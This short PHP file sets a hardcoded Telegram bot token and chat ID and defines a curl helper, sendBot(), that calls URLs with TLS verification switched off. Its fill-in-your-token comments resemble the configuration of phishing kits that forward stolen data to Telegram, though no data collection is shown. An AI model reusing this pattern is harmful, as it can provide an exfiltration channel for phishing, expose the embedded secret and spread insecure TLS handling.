<?php 



$api = "6148556384:AAFBD_aWk850NLsrRTmIePD0hn_0RV3AswE";#=====> Your IpTocken
$chatid = "-4208611074";#=====> Your Chatb ID



function sendBot($url){
	$ci = curl_init();
	curl_setopt($ci, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ci,CURLOPT_FOLLOWLOCATION, true);
	curl_setopt($ci, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ci, CURLOPT_URL, $url);
	return curl_exec($ci);
	curl_close($ci);
}



?>